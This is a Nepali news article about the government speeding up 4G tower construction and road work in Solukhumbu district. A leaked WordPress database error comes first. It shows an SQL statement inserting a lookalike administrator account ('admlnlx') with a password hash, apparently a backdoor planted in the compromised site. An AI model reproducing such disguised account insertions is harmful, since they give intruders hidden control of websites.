WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$By.E9fVfeNW66l35FGlUVCQsOMkUbN/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 13:33:07', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाण्डौं । सोलुखुम्बु जिल्लामा फोरजी सेवा बिस्तारका लागि सञ्चार मन्त्रालयले तिब्र गतिमा काम अगाडि बढाएकोे छ ।
सोलुखुम्बु जिल्लाबाट निर्वाचित संघीय सांसद हेमकुमार राई ‘सुरवीर’को नेतृत्वमा गएको जनप्रतिनिधिमण्डलसँगको भेटमा सञर तथा सूचना प्रबिधि मन्त्रालयको समेत जिम्मेवारी सम्हाल्नु भएका अर्थमन्त्रि युबराज खतिवडाले फोरजीको काम तिब्र गतिमा भएको बताए ।
प्रतिनिधिमण्डलमा सांसद राईसंगै थुलुङ दुधकोशी गाउँपालिका अध्यक्ष अशिम राई, खुम्बुपासाङ ल्हामु गाउँपालिका कार्यबाक अध्यक्ष टासील्हामु शेर्पा लगायतका जनप्रतिनिधिहरुको सहभागी थियो ।
भेटमा जिल्लामा निमार्णधीन सडकको काम छिटो सम्पन्न गर्न आवश्यक थप बजेटको ब्याबस्था गर्न, सञ्चारको गुणस्तीयतामा वृद्धि गर्न मन्त्रि खतिवडाको ध्यानाकर्षण गरिएको सांसद राईको सचिवालयले जनाएको छ ।
कटारी–घुर्मी एक खण्ड र सल्लेरी–खुम्बु अर्को खण्ड गरि हिमाल तराई जोण्डने सडकको काम अगाडी बढाउन मन्त्रिलाई आग्रह गरिएको भेटमा सहभागि थुलुङ दुधकोशी गाउँपालिका अध्यक्ष अशिम राईले बताए ।
सोलुखुम्बु जिल्लामा निर्माणधीन नेपाल टेलिकमको फोरजी टावरको निमार्ण ढिलाई हँुदा स्थानीय जनता इन्टरनेटको पंहुचसंग जोडिन नसकेको भन्दै टावरको निर्माण छिटो सम्पन्न गरि फोरजी सेवा सुरु गर्न सांसद राईले आग्रह गरेको भेटमा सहभागि खुम्बुपासाङ ल्हामु गाउँपालिका कार्यबहाक अध्यक्ष टासील्हामु शेर्पाले बताए ।